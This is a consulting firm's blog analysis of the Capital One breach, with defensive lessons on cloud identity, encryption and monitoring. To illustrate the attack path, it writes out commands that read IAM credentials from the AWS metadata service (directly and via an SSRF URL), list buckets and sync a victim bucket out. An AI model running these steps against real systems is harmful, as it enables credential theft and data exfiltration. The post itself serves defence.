
Capital One data breach – what we can learn from the speculation

Despite the Capital One data breach having only been announced a few days ago, the Internet is rife with speculative detail about the attack vectors the hacker may have used to exfiltrate the data.  While the true details remain unconfirmed, many of the theories describe very real threats that should be understood and dealt with, regardless of whether they were the actual vulnerabilities exploited.

The court filings indicate there were three main steps the attacker took:

  1. Obtain the credentials to access the S3 buckets containing the data
  2. List all of the S3 buckets available to those credentials
  3. Sync the data out of the S3 buckets

Let’s take a look at the ways in which the attacker might have been able to perform each of these steps, and how they could have been prevented.

Obtaining credentials

The AWS metadata service

All of the plausible theories include the exploitation of one important component – the AWS metadata service. This service is built into the hypervisor of every AWS server and is responsible for handing out temporary credentials for accessing other AWS resources.  The beauty of the service is that, rather than clients having to handle credentials themselves (with all of the issues that brings), we can grant resource A rights to resource B and the metadata service takes care of the rest.
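
As an illustration of that model, here is a minimal sketch (role, bucket and instance names are placeholders, not anything from the Capital One environment) of granting an EC2 instance read access to a single S3 bucket via a role and instance profile, so that no long-lived keys ever need to live on the host:

    # Create a role that EC2 instances may assume (trust policy supplied separately)
    aws iam create-role --role-name demo-web-role \
        --assume-role-policy-document file://ec2-trust-policy.json

    # Grant the role read access to objects in one specific bucket only
    aws iam put-role-policy --role-name demo-web-role --policy-name s3-read-one-bucket \
        --policy-document '{
          "Version": "2012-10-17",
          "Statement": [{
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::demo-bucket/*"
          }]
        }'

    # Attach the role to an instance via an instance profile; the metadata service
    # then serves short-lived credentials for this role to that instance
    aws iam create-instance-profile --instance-profile-name demo-web-profile
    aws iam add-role-to-instance-profile --instance-profile-name demo-web-profile \
        --role-name demo-web-role
    aws ec2 associate-iam-instance-profile --instance-id i-0123456789abcdef0 \
        --iam-instance-profile Name=demo-web-profile

The convenience cuts both ways: anything that can make HTTP requests from that instance can retrieve the same short-lived credentials.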

STRONG DISCLAIMER: Capital One is not a client of Citihub Consulting and we have no inside knowledge of how this attack occurred. The information in this blog is based on our knowledge of using AWS and other publicly-available information.

One potential attack vector via the metadata service is that, if resource A (a VM) has rights to access another resource B (an S3 bucket), and a hacker is able to compromise resource A, then all of that resource’s credentials can be obtained in plaintext using curl against the metadata endpoint (http://169.254.169.254/latest/meta-data/iam/security-credentials/).  Once those credentials have been hijacked, they can be used from pretty much anywhere if there are no other controls in place (e.g. network ACLs).
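
As a rough sketch of what that hijack looks like in practice (the role name below is a placeholder, not the actual role from the case), an attacker who can issue requests from, or via, the compromised instance needs only two calls:

    # Ask the metadata service which role is attached to this instance
    curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
    # Returns the role name, e.g. my-instance-role

    # Ask for that role's temporary credentials
    curl http://169.254.169.254/latest/meta-data/iam/security-credentials/my-instance-role
    # Returns AccessKeyId, SecretAccessKey and Token as plaintext JSON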

The IAM role being focused on is referred to in the FBI case as “*****-WAF-Webrole”, so the speculation is that this role was assigned to a Web Application Firewall (WAF), providing access to several hundred S3 buckets (either for logging purposes or for serving up static web content), and appears to have been overly broad in terms of the buckets it had access to.

Metadata service hijack

Initial speculation, based on the “*****-WAF-Webrole” role name, was that a vulnerability in a WAF allowed the hacker to gain shell access to the device in order to query the metadata endpoint on the device’s hypervisor.  Whilst a WAF vulnerability exploit is plausible, there is no public information on the exact WAF product being used.

An alternative vector is Server Side Request Forgery (SSRF).

SSRF is an attack vector whereby a server is used to proxy a connection to another site by modifying URLs in web/API calls. More often than not it is a webhook that is exploited – a mechanism that tells a server-side application to make a call to another URL for information.  SSRF is extremely difficult to detect without context about the application.

In this case, an application server behind the WAF may have been instructed to direct traffic to the WAF’s metadata service endpoint, which then returned the credentials in the response. It is worth noting that an application server subject to an SSRF attack would itself need access to the “*****-WAF-Webrole”, because it is not possible to query the metadata service endpoint across different hosts. This would suggest that either another service was running on the WAF host or the role was used elsewhere in the environment.
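
A purely hypothetical example of what such a request might look like, assuming an endpoint that fetches whatever URL it is handed in a parameter (the host, path and parameter names are invented for illustration):

    # The vulnerable application dutifully fetches the "url" parameter server-side
    # and returns the body, handing the role's credentials back to the attacker
    curl 'https://app.example.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/my-instance-role'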

In comparison to AWS, GCP requires a specific header to be provided to its equivalent service, which helps to protect against SSRF in cases where the attacker doesn’t have control of the full HTTP request.
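
For comparison, a sketch of the GCP call: the metadata server rejects any request that does not carry the Metadata-Flavor header, which a simple URL-substitution SSRF typically cannot add:

    # Without the header this returns an error rather than a token
    curl -H "Metadata-Flavor: Google" \
        "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"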

Lessons:

  • Vulnerability Management: vulnerabilities in web-facing components need to be handled as quickly as possible. In the public cloud, particularly with PaaS services, there may be more web-facing components than you realise.
  • Least Privilege: ensure that assigned roles, particularly those on vulnerable components, are restricted to only the resources they need access to.
  • Role Re-Use: don’t re-use roles built for specific components on other, different components.
  • One Purpose per Host: don’t run several distinct services on the same host, as it results in that host having excessive privileges.
  • Control access to the IAM metadata service: as far as possible, prevent servers from proxying requests to the metadata endpoint and block any requests coming through your firewall that include the metadata URL (see the sketch after this list).
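
As a minimal host-level sketch of that last point (the account name is illustrative, and the right control will vary by platform), outbound traffic to the metadata endpoint can be dropped for everything except the one local account that genuinely needs it:

    # Only the "metadata-reader" account may talk to the instance metadata service
    iptables -A OUTPUT -d 169.254.169.254 -m owner ! --uid-owner metadata-reader -j DROP

On the ingress side, a WAF or reverse-proxy rule that rejects any request containing 169.254.169.254 closes off the most obvious SSRF path.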

“List” buckets

Once armed with credentials, the next activity the hacker performed was to list the buckets available to those credentials.

Web Application Firewalls don’t need to list buckets during the course of normal activity, so the ability to list buckets should not have been part of a role which supposedly was assigned to a WAF. This allowed the hacker to list all of the bucket names available to that role – over 700 buckets, according to the court filing.
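
To illustrate how little effort this step takes once credentials are in hand (the values below are placeholders), listing every bucket visible to the role is a single CLI call:

    # Export the hijacked temporary credentials from the metadata response
    export AWS_ACCESS_KEY_ID=<AccessKeyId from the metadata response>
    export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
    export AWS_SESSION_TOKEN=<Token>

    # List every bucket the role is allowed to see
    aws s3 ls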

The assumption that, once the credentials had been hijacked, the hacker accessed these buckets from outside of the Capital One VPC would point to the S3 buckets not having IP restrictions limiting access to specific parts of the Capital One network.
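
One way to impose such a restriction is a bucket policy that denies requests from anywhere outside an approved range. A minimal sketch, where the bucket name and CIDR are placeholders (in a VPC-centric setup, a condition on aws:SourceVpce is the more common equivalent):

    aws s3api put-bucket-policy --bucket example-bucket --policy '{
      "Version": "2012-10-17",
      "Statement": [{
        "Sid": "DenyRequestsFromOutsideApprovedRanges",
        "Effect": "Deny",
        "Principal": "*",
        "Action": "s3:*",
        "Resource": ["arn:aws:s3:::example-bucket",
                     "arn:aws:s3:::example-bucket/*"],
        "Condition": {
          "NotIpAddress": { "aws:SourceIp": "203.0.113.0/24" }
        }
      }]
    }'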

The hacker used VPN and TOR to cover her tracks, and Capital One confirmed that the network logs showed several access attempts from TOR exit nodes.  Whilst people do use TOR for legitimate purposes, any such access attempt (especially repeated attempts) should be treated as highly suspicious.

Lessons:

  • Least privileged roles: ensure assigned roles have only the permissions required to fulfil their function (in this case, the list-buckets action was not required by the WAF) and only have access to the resources required for that function (see the sketch after this list).
  • IP restrictions: assume that resources can and will be accessed from outside of your VPCs/VNets and restrict the networks that resources can be accessed from.
  • Use heuristics to identify normal vs abnormal: it’s likely that the “list” action on a large number of buckets was not normal activity for a user assuming the “WAF” role.
  • Constrain known exploitation channels: decide whether TOR and VPN exit nodes should be considered legitimate locations for your clients to come from and manage accordingly.
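
A quick way to check the first point against an existing role is the IAM policy simulator. A sketch, with a placeholder account ID and role name, testing whether the role can list buckets at all:

    # An "allowed" result for s3:ListAllMyBuckets would be a red flag for a WAF role
    aws iam simulate-principal-policy \
        --policy-source-arn arn:aws:iam::123456789012:role/demo-waf-role \
        --action-names s3:ListAllMyBuckets s3:GetObject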

“Sync” buckets

Finally, armed with credentials for accessing these buckets and a list of the buckets available to them, the hacker was able to make copies of the data.
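
Again, with the hijacked credentials still exported, this is a single command per bucket (the bucket name is a placeholder):

    # Copy the entire contents of a bucket to local disk
    aws s3 sync s3://example-victim-bucket ./copied-data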

Whilst some of the data fields were tokenized, the first question that springs to mind is, was the data encrypted?


Server-side encryption using AWS-managed keys would not have protected against this attack: because the requestor appeared to be a genuine user, the S3 service would have transparently decrypted the data from disk.

Had the data been server-side encrypted using Capital One’s own keys, then the credentials obtained by the hacker would also have needed access to the keys held in the AWS Key Management Service (KMS).  It’s possible that the WAF was encrypting/decrypting using customer-managed keys, in which case the “*****-WAF-Webrole” would have had access into KMS for one or more keys.  If the exfiltrated data had been encrypted in this way, then either those credentials had overly broad access to keys in KMS, or encryption keys had been re-used across multiple buckets.
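
For reference, a sketch of what turning on that protection looks like (the bucket name and key ARN are placeholders): setting a bucket’s default encryption to SSE-KMS with a customer-managed key means a reader needs kms:Decrypt on that specific key as well as s3:GetObject on the bucket.

    aws s3api put-bucket-encryption --bucket example-bucket \
        --server-side-encryption-configuration '{
          "Rules": [{
            "ApplyServerSideEncryptionByDefault": {
              "SSEAlgorithm": "aws:kms",
              "KMSMasterKeyID": "arn:aws:kms:us-east-1:123456789012:key/11111111-2222-3333-4444-555555555555"
            }
          }]
        }'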

One challenge with customer-managed keys is that they make the data pipeline significantly more complex to get right, because each component in the pipeline needs appropriate permissions on the key store, so users are likely to choose the default options.  In this case, the data was Parquet files for use in Redshift, so the application team may have considered the tokenization of specific data fields a sufficient control, avoiding the need to manage customer-managed keys across their data pipeline.

Finally, as with listing buckets, synchronizing entire buckets (many of which had probably not been touched for some time) from TOR and VPN exit points should have raised monitoring alerts.
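
As a small sketch of the kind of check that should be automated rather than manual, CloudTrail already records these calls and can be queried for them:

    # Pull recent ListBuckets calls and inspect the source IP addresses in each event
    aws cloudtrail lookup-events \
        --lookup-attributes AttributeKey=EventName,AttributeValue=ListBuckets \
        --max-results 50 \
        --query 'Events[].CloudTrailEvent'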

Lessons:

  • CSP-managed encryption only gets you so far: if you present legitimate credentials to access the data, it will be served up to you in plaintext, so consider customer-managed keys as the minimum bar for sensitive data.
  • Least privileged access to keys: overly broad access policies on key material compromise encryption, so constrain key access as tightly as possible.
  • Key re-use: re-using keys across data sets or purposes weakens encryption. Look at the key management processes and ensure that users aren’t re-using keys because provisioning and managing a large number of distinct keys is too cumbersome.
  • Egress monitoring and alerting: data egress of this kind, from these kinds of addresses, is not normal. The logs showing this activity were captured, but the monitoring rules around them did not flag it to security operations teams. Review your logging and alerting rules regularly.
  • Audit all of your systems regularly: Capital One has reported that some of this data was collected back in 2016. Given that the public cloud ecosystem and our own understanding of it are maturing rapidly, public cloud systems should be audited on a very regular basis to ensure they are up to the latest standards. Whilst automated tools can do a great job (Capital One were responsible for open-sourcing “Cloud Custodian”), manual spot checks should still be part of the operating model.
  • Practice defensible disposal: Questions are arising about why this data had not been disposed of, particularly in light of GDPR requirements.

Was this a development environment?

Given the overly broad privileges, the reduced protection of sensitive data and the lack of monitoring/alerting, it’s plausible that this was a non-production environment into which development teams had loaded selectively tokenized copies of their production data, data which was otherwise well protected in production (possibly even inside Capital One’s data centre).

Lessons:

  • Treat Non-Production as Production: developer productivity is a driving force behind the move to the cloud, and overly strict controls are viewed as an affront to agility. Whilst strict controls can get in the way of certain development activities, any non-production environment which contains sensitive data must be protected according to the classification of that data, not the class of the environment. In the world of “shift-left”, production controls should be exposed to development teams early in the test lifecycle.
  • Test Data Management: building data sets that are representative of production is not an easy task, and more often than not application teams will use obfuscated copies of production data. Regularly reviewing how copies of data for testing purposes are obfuscated and protected, and where those copies are stored, is an important part of every data owner’s responsibilities.  Consider treating test data as you would production data, because even obfuscated data may appear to be real, resulting in unflattering headlines.

Was it an inside job?

Whilst it is reported that the hacker had grievances against her former employer which may have provided a motive for the attack, we think it is unlikely that her experience working at AWS between 2015 and 2016 would have provided knowledge of vulnerabilities in the AWS platform that aren’t already publicly documented.

Summary

This was a very public exploit of a highly visible champion of public cloud in the financial services industry and is likely to be a setback for many public cloud programs.  The full nature of the vectors used in this attack is still to be revealed (if ever, although let’s hope Capital One makes the RCA publicly available); however, the speculative theories alone have highlighted some very important “gotchas” that should be front and center of every public cloud security program, not least the management of identities and privileges.

As we touched on in our “PaaS challenges” article, given the porous nature of the network in the public cloud, effective identity and privilege management is your number one security tool. This exploit appears to have leveraged identity and privilege management weaknesses both in the AWS platform and at Capital One, for which, ultimately, the industry as a whole will pay a price.


Useful Links:

The Netflix Tech Blog: Netflix Cloud Security: Detecting Credential Compromise in AWS

Evan J Blog: Preventing The Capital One Breach

Medium: Capital One, 100 Million People Data Breach: Technical Analysis

Hacker News: https://news.ycombinator.com/item?id=20560342

Reddit: Capitol One Breach on AWS


Citihub Consulting works with forward-thinking banks and large enterprises, helping to define and implement their digital transformation.


Author

Ian Tivey

Associate Partner, New York

Ian has a broad background across DevOps and Infrastructure disciplines in the design, build and operation of globally-distributed market data distribution and trading platforms. He currently leads Citihub Consulting’s Cloud Practice, having worked with clients in Europe, Asia, and North America to design and build hybrid cloud solutions in highly regulated banking environments.

ian.tivey@citihub.com